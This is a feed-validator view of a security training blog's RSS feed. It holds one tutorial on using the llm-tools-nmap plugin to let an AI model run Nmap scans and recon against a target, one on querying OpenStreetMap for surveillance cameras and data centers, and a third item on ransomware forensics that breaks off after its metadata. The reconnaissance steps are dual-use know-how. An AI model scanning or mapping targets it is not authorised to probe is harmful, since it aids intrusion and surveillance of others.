Congratulations!

[Valid RSS] This is a valid RSS feed.

Recommendations

This feed is valid, but interoperability with the widest range of feed readers could be improved by implementing the following recommendations.

Source: https://www.hackers-arise.com/blog-feed.xml

  1. <?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
  2. xmlns:content="http://purl.org/rss/1.0/modules/content/"
  3. xmlns:wfw="http://wellformedweb.org/CommentAPI/"
  4. xmlns:dc="http://purl.org/dc/elements/1.1/"
  5. xmlns:atom="http://www.w3.org/2005/Atom"
  6. xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
  7. xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
  8. >
  9.  
  10. <channel>
  11. <title>Hackers Arise</title>
  12. <atom:link href="https://hackers-arise.com/feed/" rel="self" type="application/rss+xml" />
  13. <link>https://hackers-arise.com</link>
  14. <description>EXPERT CYBERSECURITY TRAINING FOR ETHICAL HACKERS</description>
  15. <lastBuildDate>Tue, 14 Oct 2025 16:21:32 +0000</lastBuildDate>
  16. <language>en-US</language>
  17. <sy:updatePeriod>
  18. hourly </sy:updatePeriod>
  19. <sy:updateFrequency>
  20. 1 </sy:updateFrequency>
  21. <generator>https://wordpress.org/?v=6.8.3</generator>
  22.  
  23. <image>
  24. <url>https://hackers-arise.com/wp-content/uploads/2025/04/cropped-Favicon-32x32.webp</url>
  25. <title>Hackers Arise</title>
  26. <link>https://hackers-arise.com</link>
  27. <width>32</width>
  28. <height>32</height>
  29. </image>
  30. <item>
  31. <title>Artificial Intelligence in Cybersecurity: Using AI for Port Scanning</title>
  32. <link>https://hackers-arise.com/artificial-intelligence-in-cybersecurity-using-ai-for-port-scanning/</link>
  33. <dc:creator><![CDATA[aircorridor]]></dc:creator>
  34. <pubDate>Tue, 14 Oct 2025 16:21:30 +0000</pubDate>
  35. <category><![CDATA[OSINT & Reconnaissance]]></category>
  36. <guid isPermaLink="false">https://hackers-arise.com/?p=18734</guid>
  37.  
  38. <description><![CDATA[<p>Welcome back, aspiring cyberwarriors! Nmap has been the gold standard of network scanning for decades, and over that time it has accumulated hundreds of command-line options and NSE scripts. On one hand that&#8217;s great, since you can tailor the command to your needs; on the other hand, it requires expertise. What if you could simply [&#8230;]</p>
  39. <p>The post <a href="https://hackers-arise.com/artificial-intelligence-in-cybersecurity-using-ai-for-port-scanning/">Artificial Intelligence in Cybersecurity: Using AI for Port Scanning</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></description>
  40. <content:encoded><![CDATA[<p>Welcome back, aspiring cyberwarriors!</p>
  41.  
  42.  
  43.  
  44. <p>Nmap has been the gold standard of network scanning for decades, and over that time it has accumulated hundreds of command-line options and NSE scripts. On one hand that&#8217;s great, since you can tailor the command to your needs; on the other hand, it requires expertise. What if you could simply tell an AI in plain English what you want to discover, and have it automatically select the right Nmap commands, parse the results, and identify security issues?</p>
  45.  
  46.  
  47.  
  48. <p>That&#8217;s exactly what the LLM-Tools-Nmap utility does. Basically, it bridges the gap between Large Language Models (LLMs) and Nmap.</p>
  49.  
  50.  
  51.  
  52. <p>Let&#8217;s explore how to use this tool and which features it has.</p>
  53.  
  54.  
  55.  
  56. <h2 class="wp-block-heading">Step #1: Let&#8217;s Take a Closer Look at What LLM-Tools-Nmap Is</h2>
  57.  
  58.  
  59.  
  60. <p>LLM-Tools-Nmap is a plugin for Simon Willison&#8217;s llm command-line tool that provides Nmap network scanning capabilities through AI function calling. The llm CLI tool is used for interacting with OpenAI, Gemini, and dozens of other LLMs. LLM-Tools-Nmap enables LLMs to &#8220;intelligently&#8221; control Nmap, selecting appropriate scan types, options, and NSE scripts based on natural language instructions.</p>
  61.  
  62.  
  63.  
  64. <p>The key innovation here is tool use or function calling &#8211; the ability for an LLM to not just generate text, but to execute actual commands and interpret their results. The AI becomes an intelligent wrapper around Nmap, translating your intent into proper scanning commands.</p>
  65.  
  66.  
  67.  
  68. <h2 class="wp-block-heading">Step #2: Installing LLM-Tools-Nmap</h2>
  69.  
  70.  
  71.  
  72. <p>Kali Linux 2025.3 release already has this tool in its repository. But if you&#8217;re using an older version, consider installing it manually from GitHub.</p>
  73.  
  74.  
  75.  
  76. <p><code>kali> git clone https://github.com/peter-hackertarget/llm-tools-nmap.git</code></p>
  77.  
  78.  
  79.  
  80. <figure class="wp-block-image size-full"><img fetchpriority="high" decoding="async" width="872" height="233" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_clone_repo.webp" alt="" class="wp-image-18735" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_clone_repo.webp 872w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_clone_repo-300x80.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_clone_repo-768x205.webp 768w" sizes="(max-width: 872px) 100vw, 872px" /></figure>
  81.  
  82.  
  83.  
  84. <p><code>kali> cd llm-tools-nmap</code></p>
  85.  
  86.  
  87.  
  88. <p>Next, we need to install the core llm CLI tool. It can be installed via pip; I&#8217;m going to use pipx instead, to get an isolated environment.</p>
  89.  
  90.  
  91.  
  92. <p><strong><code>kali> pipx install llm</code></strong></p>
  93.  
  94.  
  95.  
  96. <figure class="wp-block-image size-full"><img decoding="async" width="871" height="179" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_install_llm.webp" alt="" class="wp-image-18736" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_install_llm.webp 871w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_install_llm-300x62.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_install_llm-768x158.webp 768w" sizes="(max-width: 871px) 100vw, 871px" /></figure>
  97.  
  98.  
  99.  
  100. <p>Verify the installation:</p>
  101.  
  102.  
  103.  
  104. <p><code>kali> llm --version</code></p>
  105.  
  106.  
  107.  
  108. <figure class="wp-block-image aligncenter size-full"><img decoding="async" width="422" height="170" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_check_llm_version.webp" alt="" class="wp-image-18737" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_check_llm_version.webp 422w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_check_llm_version-300x121.webp 300w" sizes="(max-width: 422px) 100vw, 422px" /></figure>
  109.  
  110.  
  111.  
  112. <h2 class="wp-block-heading">Step #3: Configure an LLM Model</h2>
  113.  
  114.  
  115.  
  116. <p>You must configure an LLM model before using the llm-tools-nmap. By default, the LLM tool tries to use OpenAI, which requires an API key. If you don&#8217;t want to pay for a paid OpenAI account, you can install local models via Ollama—just keep in mind that this requires appropriate hardware. Alternatively, you can use Google Gemini, which offers a free tier; that&#8217;s the option I&#8217;ll be using.</p>
  117.  
  118.  
  119.  
  120. <p>To use Gemini in llm-tools-nmap, you need to install the plugin:</p>
  121.  
  122.  
  123.  
  124. <p><code>kali> llm install llm-gemini</code></p>
  125.  
  126.  
  127.  
  128. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="849" height="266" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_install_gemini_plugin.webp" alt="" class="wp-image-18738" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_install_gemini_plugin.webp 849w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_install_gemini_plugin-300x94.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_install_gemini_plugin-768x241.webp 768w" sizes="(max-width: 849px) 100vw, 849px" /></figure>
  129.  
  130.  
  131.  
  132. <p>Next, we need to obtain an API key. That can be done on the following page: <a href="https://aistudio.google.com/apikey">https://aistudio.google.com/apikey</a>.</p>
  133.  
  134.  
  135.  
  136. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="247" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_gemini_api_key-1024x247.webp" alt="" class="wp-image-18739" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_gemini_api_key-1024x247.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_gemini_api_key-300x72.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_gemini_api_key-768x185.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_gemini_api_key-1536x370.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_gemini_api_key.webp 1868w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  137.  
  138.  
  139.  
  140. <p>Then set it:</p>
  141.  
  142.  
  143.  
  144. <p><code>kali> llm keys set gemini</code></p>
  145.  
  146.  
  147.  
  148. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="855" height="174" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_set_api.webp" alt="" class="wp-image-18740" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_set_api.webp 855w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_set_api-300x61.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_set_api-768x156.webp 768w" sizes="(max-width: 855px) 100vw, 855px" /></figure>
  149.  
  150.  
  151.  
  152. <p>Now, we can verify Gemini is available:</p>
  153.  
  154.  
  155.  
  156. <p><code>kali> llm models</code></p>
  157.  
  158.  
  159.  
  160. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="862" height="482" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_gemini_modules.webp" alt="" class="wp-image-18741" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_gemini_modules.webp 862w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_gemini_modules-300x168.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_gemini_modules-768x429.webp 768w" sizes="(max-width: 862px) 100vw, 862px" /></figure>
  161.  
  162.  
  163.  
  164. <p>You should see output similar to the above. Choose a model from the list and set it as the default:</p>
  165.  
  166.  
  167.  
  168. <p><code>kali> llm models default gemini-x.x-xxxx</code></p>
  169.  
  170.  
  171.  
  172. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="849" height="155" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_default_model.webp" alt="" class="wp-image-18742" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_default_model.webp 849w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_default_model-300x55.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_default_model-768x140.webp 768w" sizes="(max-width: 849px) 100vw, 849px" /></figure>
  173.  
  174.  
  175.  
  176. <h2 class="wp-block-heading">Step #4: Understanding the Function-Calling Architecture</h2>
  177.  
  178.  
  179.  
  180. <p>A generalized diagram of how llm-tools-nmap works under the hood is shown below:</p>
  181.  
  182.  
  183.  
  184. <figure class="wp-block-image aligncenter size-large"><img loading="lazy" decoding="async" width="234" height="1024" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_diagram-234x1024.webp" alt="" class="wp-image-18743"/></figure>
  185.  
  186.  
  187.  
  188. <p>The process begins when the user supplies a natural-language instruction. The AI then interprets the intent, deciding which Nmap functions are needed, and the plugin executes the appropriate Nmap commands on the target. Once Nmap finishes, its output is captured and sent back to the LLM, which analyzes the results and translates them into a clear, natural-language summary for the user.</p>
  189.  
  190.  
  191.  
  192. <p>The plugin provides eight core functions:</p>
  193.  
  194.  
  195.  
  196. <p><strong>get_local_network_info(): </strong>Discovers network interfaces and suggests scan ranges<br><strong>nmap_quick_scan(target): </strong>Fast scan of common ports<br><strong>nmap_port_scan(target, ports):</strong> Scan specific ports<br><strong>nmap_service_detection(target, ports):</strong> Service version detection<br><strong>nmap_os_detection(target):</strong> Operating system fingerprinting<br><strong>nmap_ping_scan(target):</strong> Host discovery<br><strong>nmap_script_scan(target, script, ports):</strong> Run NSE scripts<br><strong>nmap_scan(target, options):</strong> Generic Nmap with custom options</p>
  197.  
  198.  
  199.  
  200. <p>The AI automatically selects which functions to use based on your query.</p>
  201.  
  202.  
  203.  
  204. <h2 class="wp-block-heading">Step #5: Getting Started with Llm-tools-nmap</h2>
  205.  
  206.  
  207.  
  208. <p>Let&#8217;s find live hosts on the network:</p>
  209.  
  210.  
  211.  
  212. <p><code>kali> llm --functions llm-tools-nmap.py "Scan my local network to find live hosts"</code></p>
  213.  
  214.  
  215.  
  216. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="950" height="479" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_live_hosts.webp" alt="" class="wp-image-18744" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_live_hosts.webp 950w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_live_hosts-300x151.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_live_hosts-768x387.webp 768w" sizes="(max-width: 950px) 100vw, 950px" /></figure>
  217.  
  218.  
  219.  
  220. <p>Good. Now, let&#8217;s do a rapid recon of a target:</p>
  221.  
  222.  
  223.  
  224. <p><code>kali> llm --functions llm-tools-nmap.py "Do a quick port scan of &lt;IP>"</code></p>
  225.  
  226.  
  227.  
  228. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="941" height="323" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_quick_port_scan.webp" alt="" class="wp-image-18745" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_quick_port_scan.webp 941w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_quick_port_scan-300x103.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_quick_port_scan-768x264.webp 768w" sizes="(max-width: 941px) 100vw, 941px" /></figure>
  229.  
  230.  
  231.  
  232. <p>This executes a fast scan (-T4 -F) of common ports.</p>
  233.  
  234.  
  235.  
  236. <p>Next, let&#8217;s try to do a multistage recon:</p>
  237.  
  238.  
  239.  
  240. <p><strong><code>kali> llm --functions llm-tools-nmap.py "What services are running on &lt;IP>? Gather as much information as you can and identify any security issues or items of interest to a security analyst"</code></strong></p>
  241.  
  242.  
  243.  
  244. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="937" height="780" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_full_scan1.webp" alt="" class="wp-image-18746" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_full_scan1.webp 937w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_full_scan1-300x250.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_full_scan1-768x639.webp 768w" sizes="(max-width: 937px) 100vw, 937px" /></figure>
  245.  
  246.  
  247.  
  248. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="938" height="645" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_full_scan2.webp" alt="" class="wp-image-18747" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_full_scan2.webp 938w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_full_scan2-300x206.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_full_scan2-768x528.webp 768w" sizes="(max-width: 938px) 100vw, 938px" /></figure>
  249.  
  250.  
  251.  
  252. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="942" height="572" src="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_full_scan3.webp" alt="" class="wp-image-18748" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_full_scan3.webp 942w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_full_scan3-300x182.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/llm_nmap_full_scan3-768x466.webp 768w" sizes="(max-width: 942px) 100vw, 942px" /></figure>
  253.  
  254.  
  255.  
  256. <p>The AI will first carry out an initial port scan, then run service detection on any ports that are found open. After that, it executes the relevant NSE scripts and analyzes the resulting data for security implications. Finally, it presents a comprehensive report that highlights any identified vulnerabilities.</p>
  257.  
  258.  
  259.  
  260. <h2 class="wp-block-heading">Summary</h2>
  261.  
  262.  
  263.  
  264. <p>Someone who reads this article might start arguing that AI could replace pentesters. While this tool demonstrates how AI can simplify hacking and reconnaissance—allowing you to type a single English sentence and have Nmap begin scanning—it is far from a substitute for a skilled hacker. An experienced professional understands Nmap&#8217;s myriad flags and can think creatively to adapt scans to complex scenarios.</p><p>The post <a href="https://hackers-arise.com/artificial-intelligence-in-cybersecurity-using-ai-for-port-scanning/">Artificial Intelligence in Cybersecurity: Using AI for Port Scanning</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></content:encoded>
  265. </item>
  266. <item>
  267. <title>OSINT: Finding Surveillance Cameras with Overpass Turbo</title>
  268. <link>https://hackers-arise.com/osint-finding-surveillance-cameras-with-overpass-turbo/</link>
  269. <dc:creator><![CDATA[aircorridor]]></dc:creator>
  270. <pubDate>Mon, 13 Oct 2025 14:13:52 +0000</pubDate>
  271. <category><![CDATA[OSINT & Reconnaissance]]></category>
  272. <guid isPermaLink="false">https://hackers-arise.com/?p=18624</guid>
  273.  
  274. <description><![CDATA[<p>Welcome back, aspiring cyberwarriors! In the reconnaissance phase of any security engagement, information gathering is paramount. Previously, we discussed using Google Earth Pro for investigations. Today, let’s shift our focus from satellite OSINT to map‑based reconnaissance. Many of you are already familiar with Google Maps and its alternatives, such as OpenStreetMap (OSM). But did you know that you can [&#8230;]</p>
  275. <p>The post <a href="https://hackers-arise.com/osint-finding-surveillance-cameras-with-overpass-turbo/">OSINT: Finding Surveillance Cameras with Overpass Turbo</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></description>
  276. <content:encoded><![CDATA[<p>Welcome back, aspiring cyberwarriors!</p>
  277.  
  278.  
  279.  
  280. <p>In the reconnaissance phase of any security engagement, information gathering is paramount. Previously, we discussed using <a href="https://hackers-arise.com/open-source-intelligence-osint-using-google-earth-pro-satellite-imagery-for-investigations/" title="">Google Earth Pro</a> for investigations. Today, let’s shift our focus from satellite OSINT to map‑based reconnaissance. Many of you are already familiar with Google Maps and its alternatives, such as OpenStreetMap (OSM). But did you know that you can easily extract specific data from OSM, like surveillance cameras or Wi‑Fi hotspots, using a tool called <strong>Overpass Turbo</strong>?</p>
  281.  
  282.  
  283.  
  284. <p>Let’s explore how to leverage this powerful reconnaissance tool.</p>
  285.  
  286.  
  287.  
  288. <h2 class="wp-block-heading"><strong>Step #1: Understanding Overpass Turbo Basics</strong></h2>
  289.  
  290.  
  291.  
  292. <p>Overpass Turbo is accessible at <a href="https://overpass-turbo.eu">https://overpass-turbo.eu</a> and requires no installation or registration. It provides a web-based interface for querying the Overpass API, which is OpenStreetMap&#8217;s data extraction engine.</p>
  293.  
  294.  
  295.  
  296. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="502" src="https://hackers-arise.com/wp-content/uploads/2025/10/overpass_main_page-1024x502.webp" alt="" class="wp-image-18625" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/overpass_main_page-1024x502.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_main_page-300x147.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_main_page-768x376.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_main_page-1536x752.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_main_page.webp 1880w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  297.  
  298.  
  299.  
  300. <p>The interface consists of three main components:</p>
  301.  
  302.  
  303.  
  304. <p><strong>Query Editor (left side):</strong> Where you write your queries using the Overpass Query Language (QL)</p>
  305.  
  306.  
  307.  
  308. <p><strong>Interactive Map (right side): </strong>Displays your query results geographically</p>
  309.  
  310.  
  311.  
  312. <p><strong>Toolbar (top):</strong> Contains the Run button, Wizard, Export options, and settings</p>
  313.  
  314.  
  315.  
  316. <p>When you first access Overpass Turbo, you&#8217;ll see a default query loaded in the editor. The map displays the current viewport, which you can pan and zoom to focus on your area of interest.</p>
  317.  
  318.  
  319.  
  320. <h3 class="wp-block-heading"><strong>The Query Wizard</strong></h3>
  321.  
  322.  
  323.  
  324. <p>For beginners, the Wizard tool (accessible from the toolbar) provides a simplified interface. You can enter search terms in plain English, and the Wizard converts them into proper Overpass QL syntax. For example:</p>
  325.  
  326.  
  327.  
  328. <p>Type: <em>amenity=atm in London</em></p>
  329.  
  330.  
  331.  
  332. <figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="888" height="543" src="https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wizard.webp" alt="" class="wp-image-18626" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wizard.webp 888w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wizard-300x183.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wizard-768x470.webp 768w" sizes="(max-width: 888px) 100vw, 888px" /></figure>
  333.  
  334.  
  335.  
  336. <p>Click &#8220;build and run query&#8221;.</p>
  337.  
  338.  
  339.  
  340. <p>The Wizard generates the appropriate query syntax and executes it automatically.</p>
  341.  
  342.  
  343.  
  344. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="501" src="https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wizard_results-1024x501.webp" alt="" class="wp-image-18627" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wizard_results-1024x501.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wizard_results-300x147.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wizard_results-768x376.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wizard_results-1536x752.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wizard_results.webp 1879w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  345.  
  346.  
  347.  
  348. <p>As a result, we can see a map of ATMs in London.</p>
  349.  
  350.  
  351.  
  352. <h2 class="wp-block-heading"><strong>Step #2: Writing Overpass Queries</strong></h2>
  353.  
  354.  
  355.  
  356. <p>Overpass Query Language follows a specific structure. Let&#8217;s break down the anatomy of the query the Wizard built for us:</p>
  357.  
  358.  
  359.  
  360. <div class="wp-block-group is-layout-constrained wp-block-group-is-layout-constrained">
  361. <pre class="wp-block-code"><code>&#91;out:json]&#91;timeout:25];
  362. // fetch area “London” to search in
  363. {{geocodeArea:London}}->.searchArea;
  364. // gather results
  365. nwr&#91;"amenity"="atm"](area.searchArea);
  366. // print results
  367. out geom;</code></pre>
  374.  
  375.  
  376.  
  377. <p>It already includes comments, but for better understanding, let’s dive a bit deeper.</p>
  378.  
  379.  
  380.  
  381. <p><code><strong>[out:json][timeout:25]</strong></code><strong> –</strong> Sets the output format to JSON and limits the server-side execution time to 25 seconds.</p>
  382.  
  383.  
  384.  
  385. <p><code><strong>{{geocodeArea:London}}->.searchArea;</strong></code><strong> –</strong> A macro that resolves the administrative boundary of London (its OSM relation). The result is stored in a temporary set named <code>.searchArea</code> for later reference.</p>
  386.  
  387.  
  388.  
  389. <p><code><strong>nwr["amenity"="atm"](area.searchArea);</strong></code><strong> –</strong> <code>nwr</code> stands for nodes, ways, and relations.</p>
  390.  
  391.  
  392.  
  393. <p>OpenStreetMap has three element types:<br>• <strong>Node</strong>: Single-point locations (e.g., cameras, WiFi access points)<br>• <strong>Way</strong>: Lines and closed shapes (e.g., roads, building outlines)<br>• <strong>Relation</strong>: Groups of nodes and ways (e.g., building complexes, campuses)</p>
  394.  
  395.  
  396.  
  397. <p>The <strong>filter </strong><code><strong>["amenity"="atm"]</strong></code> selects all OSM elements tagged as ATMs. <code>(area.searchArea)</code> restricts the search to the previously defined London area.</p>
  398.  
  399.  
  400.  
  401. <p><code><strong>out geom;</strong></code><strong> –</strong> Outputs the matching elements together with their full geometry (<code>geom</code>): nodes as latitude/longitude points, ways with their node lists, and relations with their member geometries.</p>
  402. </div>
  403.  
  404.  
  405.  
  406. <h3 class="wp-block-heading">Tag Filters</h3>
  407.  
  408.  
  409.  
  410. <p>The core of your reconnaissance queries is the tag filter. Tags in OSM follow a key=value structure:</p>
  411.  
  412.  
  413.  
  414. <p><strong><code>node["key"="value"]</code></strong></p>
  415.  
  416.  
  417.  
  418. <p>By opening the page at <a href="https://wiki.openstreetmap.org/wiki/Map_features">https://wiki.openstreetmap.org/wiki/Map_features</a>, you can view a comprehensive list of possible keys and values. From a hacker&#8217;s perspective, you can examine the <code>man_made</code> key to discover surveillance-related options.</p>
  423.  
  424.  
  425.  
  426. <figure class="wp-block-image aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="316" src="https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wiki-1024x316.webp" alt="" class="wp-image-18628" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wiki-1024x316.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wiki-300x93.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wiki-768x237.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wiki-1536x475.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_wiki.webp 1673w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  427.  
  428.  
  429.  
  430. <p>Now, let&#8217;s edit our query and try to find surveillance cameras in California.</p>
  431.  
  432.  
  433.  
  434. <pre class="wp-block-code"><code>&#91;out:json]&#91;timeout:25];
  435. {{geocodeArea:California}}->.searchArea;
  436. nwr&#91;"surveillance"="camera"](area.searchArea);
  437. out geom;</code></pre>
  441.  
  442.  
  443.  
  444. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="443" src="https://hackers-arise.com/wp-content/uploads/2025/10/overpass_cameras-1024x443.webp" alt="" class="wp-image-18629" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/overpass_cameras-1024x443.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_cameras-300x130.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_cameras-768x332.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_cameras-1536x664.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_cameras.webp 1872w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  445.  
  446.  
  447.  
  448. <p>Now, let’s try to find data centers in Moscow.</p>
  449.  
  450.  
  451.  
  452. <pre class="wp-block-code"><code>&#91;out:json]&#91;timeout:25];
  453. {{geocodeArea:Moscow}}->.searchArea;
  454. nwr&#91;"building"="data_center"](area.searchArea);
  455. out geom;</code></pre>
  459.  
  460.  
  461.  
  462. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="421" src="https://hackers-arise.com/wp-content/uploads/2025/10/overpass_data_centers-1024x421.webp" alt="" class="wp-image-18630" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/overpass_data_centers-1024x421.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_data_centers-300x123.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_data_centers-768x316.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_data_centers-1536x631.webp 1536w, https://hackers-arise.com/wp-content/uploads/2025/10/overpass_data_centers.webp 1871w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  463.  
  464.  
  465.  
  466. <h2 class="wp-block-heading"><strong>Summary</strong></h2>
  467.  
  468.  
  469.  
  470. <p>By querying and visualizing crowdsourced data from OpenStreetMap, investigators can significantly boost their productivity. Overpass Turbo is especially useful for tasks such as tracking urban development, examining the surveillance landscape, and many other applications. In each use case, users can precisely tailor their queries to extract specific data points from the vast repository of geographic information available on OpenStreetMap.</p>
  471.  
  472.  
  473.  
  474. <p>If you’d like to advance in OSINT, consider checking out our <a href="https://hackersarise.thinkific.com/courses/osint-training" title="">OSINT training class</a>.</p>
  475.  
  476.  
  477.  
  478. <p>The post <a href="https://hackers-arise.com/osint-finding-surveillance-cameras-with-overpass-turbo/">OSINT: Finding Surveillance Cameras with Overpass Turbo</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></content:encoded>
  479. </item>
  480. <item>
  481. <title>Digital Forensics: Investigating a Ransomware Attack</title>
  482. <link>https://hackers-arise.com/digital-forensics-investigating-a-ransomware-attack/</link>
  483. <dc:creator><![CDATA[Co11ateral]]></dc:creator>
  484. <pubDate>Thu, 09 Oct 2025 13:46:32 +0000</pubDate>
  485. <category><![CDATA[Digital Forensics]]></category>
  486. <category><![CDATA[artifact preservation]]></category>
  487. <category><![CDATA[chain-of-custody]]></category>
  488. <category><![CDATA[command-line forensics]]></category>
  489. <category><![CDATA[forensic tools]]></category>
  490. <category><![CDATA[handles]]></category>
  491. <category><![CDATA[in-memory extraction]]></category>
  492. <category><![CDATA[incident-response]]></category>
  493. <category><![CDATA[IOCs]]></category>
  494. <category><![CDATA[malfind]]></category>
  495. <category><![CDATA[malware hashing]]></category>
  496. <category><![CDATA[Memory Forensics]]></category>
  497. <category><![CDATA[netscan]]></category>
  498. <category><![CDATA[process forensics]]></category>
  499. <category><![CDATA[process-tree]]></category>
  500. <category><![CDATA[RAM analysis]]></category>
  501. <category><![CDATA[Ransomware]]></category>
  502. <category><![CDATA[sandboxing]]></category>
  503. <category><![CDATA[volatile-data]]></category>
  504. <category><![CDATA[Volatility3]]></category>
  505. <category><![CDATA[WannaCry]]></category>
  506. <guid isPermaLink="false">https://hackers-arise.com/?p=18593</guid>
  507.  
